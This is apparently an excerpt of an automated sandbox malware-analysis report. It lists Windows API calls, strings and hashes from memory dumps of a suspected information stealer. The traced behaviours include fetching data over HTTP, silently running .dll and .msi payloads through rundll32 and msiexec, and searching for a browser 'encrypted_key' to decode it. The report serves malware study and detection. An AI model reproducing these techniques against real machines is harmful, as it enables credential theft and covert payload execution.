ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD52A
GetCurrentThreadId.KERNEL32 ref: 6C6AD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD55F
free.MOZGLUE(00000000), ref: 6C6AD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6AD5D3
GetCurrentThreadId.KERNEL32 ref: 6C6AD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD652
GetCurrentThreadId.KERNEL32 ref: 6C6AD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6AD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6AD6A2

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction ID: 9b8953e07197604a31493b0d65dd3307c99482accd72b78eb2f8161ceeed3414
Opcode Fuzzy Hash: 3eed7c8b0298ade49de783b97f8103c59495be1610462d0a48e51c192460f2e1
Instruction Fuzzy Hash: EE516C71604705DFC704DF65C484A9ABBF4FF8A358F108A2EE95A87710DB30B945CB99

Function 000B17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 000B17C5
ExitProcess.KERNEL32 ref: 000B17D1

Strings

block, xrefs: 000B17B7

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 90a058692c5acd8a39436965c3e3404ab122696c373dc4208d2391911b21e81e
Instruction ID: 22b993e9ebe7195f460d957890e0a0f8e94aa2361fb0755932c03cbc2c7fc2f8
Opcode Fuzzy Hash: 90a058692c5acd8a39436965c3e3404ab122696c373dc4208d2391911b21e81e
Instruction Fuzzy Hash: 3D5168B4A04249EFDB14DFA0E9A8BFE7BB5BF44744F50805CE506AB240DB70E941CB62

Function 000B2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

ShellExecuteEx.SHELL32(0000003C), ref: 000B31C5
ShellExecuteEx.SHELL32(0000003C), ref: 000B335D
ShellExecuteEx.SHELL32(0000003C), ref: 000B34EA

Strings

.msi, xrefs: 000B3398
.dll, xrefs: 000B31E5
"" , xrefs: 000B309A
C:\Windows\system32\msiexec.exe, xrefs: 000B34BF
/passive, xrefs: 000B345B
C:\Windows\system32\rundll32.exe, xrefs: 000B3332
<, xrefs: 000B3490
/i ", xrefs: 000B33E4

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: d56c1de9f3bf937543c364a881856f32a8fcb8e2a42d3039d1b3dc8b3aa61d7d
Instruction ID: 5faf1527ecab1ee699eef696e4fe3c1fc5aa8f7cabdd361005c5a13fc1194fb5
Opcode Fuzzy Hash: d56c1de9f3bf937543c364a881856f32a8fcb8e2a42d3039d1b3dc8b3aa61d7d
Instruction Fuzzy Hash: DF120E71900108AADB19FBA0DC92FEEB778AF15300F504169F50676592EF742B4ECFA2

Function 6C69EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69EC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69EC8C

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69ECA1
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C69ECC5
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C69ED19
CloseHandle.KERNEL32(?), ref: 6C69ED28
free.MOZGLUE(00000000), ref: 6C69ED2F
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69ED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C69EC94

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] profiler_ensure_started
API String ID: 4057186437-125001283
Opcode ID: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction ID: 2ae2e6adba9c6c1c82c3a60dad5285ffbeb87b2139405902274e78f0153f2d9b
Opcode Fuzzy Hash: 6f752f8e038e371429242f7d7bed7329dc5222a32dc293cb44beca4bad8acc52
Instruction Fuzzy Hash: 1C21E575600106AFDF009F26DC44A9A3779FF8636DF144210FD1897745DB31A80ACBAE

Function 6C67C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C67C5A3
WideCharToMultiByte.KERNEL32 ref: 6C67C9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C67C9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C67CA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C67CA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C67CAA5

Strings

0, xrefs: 6C67D30A
(null), xrefs: 6C67C596

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction ID: ec663ae348d2d7e35e63457b47664be838fc7f850928f8c79191e0fbf81cf5c1
Opcode Fuzzy Hash: 946298515b47d45dbfcc8824a1bb1790f2a17144965091408ef7e48c0c2a008b
Instruction Fuzzy Hash: 2AA1B230608341AFDB20DF29C59475EBBE1AFC9758F048D2DE99AD3641D731E805CB6A

Function 000B52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

Part of subcall function 000A6280: InternetOpenA.WININET(000C0DFE,00000001,00000000,00000000,00000000), ref: 000A62E1
Part of subcall function 000A6280: StrCmpCA.SHLWAPI(?,0139F5E0), ref: 000A6303
Part of subcall function 000A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000A6335
Part of subcall function 000A6280: HttpOpenRequestA.WININET(00000000,GET,?,0139ECE8,00000000,00000000,00400100,00000000), ref: 000A6385
Part of subcall function 000A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000A63BF
Part of subcall function 000A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000A63D1

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000B5318
lstrlen.KERNEL32(00000000), ref: 000B532F

Part of subcall function 000B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000B8E52

StrStrA.SHLWAPI(00000000,00000000), ref: 000B5364
lstrlen.KERNEL32(00000000), ref: 000B5383
lstrlen.KERNEL32(00000000), ref: 000B53AE

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Strings

ERROR, xrefs: 000B53B9
ERROR, xrefs: 000B530A
ERROR, xrefs: 000B54A9
ERROR, xrefs: 000B5432
ERROR, xrefs: 000B546F

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 44723a1c30eb808bdccb09681c7c454cc86b055a7483daecccc81563048200a0
Instruction ID: 9c69f130398c2c24de50aca47530440bc110411484d253654a3de3528ff31a6a
Opcode Fuzzy Hash: 44723a1c30eb808bdccb09681c7c454cc86b055a7483daecccc81563048200a0
Instruction Fuzzy Hash: E851EF70A14148ABCB24FF60DDA6BED7779AF11301F504028F5066A593EF746B4ACB62

Function 6C653480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C6534EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C65350E
__Init_thread_footer.LIBCMT ref: 6C653522
__aulldiv.LIBCMT ref: 6C653552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C65357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C653592

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

kernel32.dll, xrefs: 6C6534EA
GetSystemTimePreciseAsFileTime, xrefs: 6C653508

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction ID: 9855ab1f5cf0ff1ab9f91fc4aabf033d94efc2b8b54de8244a30b0250912f382
Opcode Fuzzy Hash: e061da427ccfffe8b3b9444bf5cfb6c200ce120e6d9a646ebd6fae84dc35615d
Instruction Fuzzy Hash: 5631B371B012469BDF00DFBAC888AAA77B5FB86745F204429F50193A64DB70B905CF69

Function 6C654480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C694843,?), ref: 6C6545F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C694843,?), ref: 6C65468A
free.MOZGLUE(?,?,?,?,?,?,6C694843,?), ref: 6C6546C9
free.MOZGLUE(?), ref: 6C6546EF
free.MOZGLUE(?), ref: 6C654712
free.MOZGLUE(?), ref: 6C654735
free.MOZGLUE(?), ref: 6C654758
free.MOZGLUE(?), ref: 6C65477B
free.MOZGLUE(?), ref: 6C65479E

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction ID: 5853785377ad7fac109c5e2629cf6a5aa9a57433c8303e5361673e4d80730685
Opcode Fuzzy Hash: 42e0285ff12e1b48db14d9e7b7756cdd3e21479a2d910f018ee96b5da21308c6
Instruction Fuzzy Hash: E5B1F671A001518FDB188E3CC8D07BD77A1AF42328FA846A9E416DBBC6D7B1D8748B59

Function 000B12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 4c1472f4db471ee6d689d155a1572de98d6a8015e3b4a32bd685876373071558
Instruction ID: 8f79994d98223728618d422b60cc975c89ffbca7b7b54a1f51211a848b239cb5
Opcode Fuzzy Hash: 4c1472f4db471ee6d689d155a1572de98d6a8015e3b4a32bd685876373071558
Instruction Fuzzy Hash: EEC194B5940219ABCB14EF60DCD9FEA7378BB54304F004599F50A6B252DF70AA85CFA1

Function 000B4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000B8E0B

lstrcat.KERNEL32(?,00000000), ref: 000B42EC
lstrcat.KERNEL32(?,0139EC28), ref: 000B430B
lstrcat.KERNEL32(?,?), ref: 000B431F
lstrcat.KERNEL32(?,0139DD28), ref: 000B4333

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000B8D90: GetFileAttributesA.KERNEL32(00000000,?,000A1B54,?,?,000C564C,?,?,000C0E1F), ref: 000B8D9F

Part of subcall function 000A9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000A9D39

Part of subcall function 000A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000A99EC
Part of subcall function 000A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000A9A11
Part of subcall function 000A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000A9A31
Part of subcall function 000A99C0: ReadFile.KERNEL32(000000FF,?,00000000,000A148F,00000000), ref: 000A9A5A
Part of subcall function 000A99C0: LocalFree.KERNEL32(000A148F), ref: 000A9A90
Part of subcall function 000A99C0: CloseHandle.KERNEL32(000000FF), ref: 000A9A9A

Part of subcall function 000B93C0: GlobalAlloc.KERNEL32(00000000,000B43DD,000B43DD), ref: 000B93D3

StrStrA.SHLWAPI(?,0139EDC0), ref: 000B43F3
GlobalFree.KERNEL32(?), ref: 000B4512

Part of subcall function 000A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000A9AEF
Part of subcall function 000A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,000A4EEE,00000000,?), ref: 000A9B01
Part of subcall function 000A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000A9B2A
Part of subcall function 000A9AC0: LocalFree.KERNEL32(?,?,?,?,000A4EEE,00000000,?), ref: 000A9B3F

lstrcat.KERNEL32(?,00000000), ref: 000B44A3
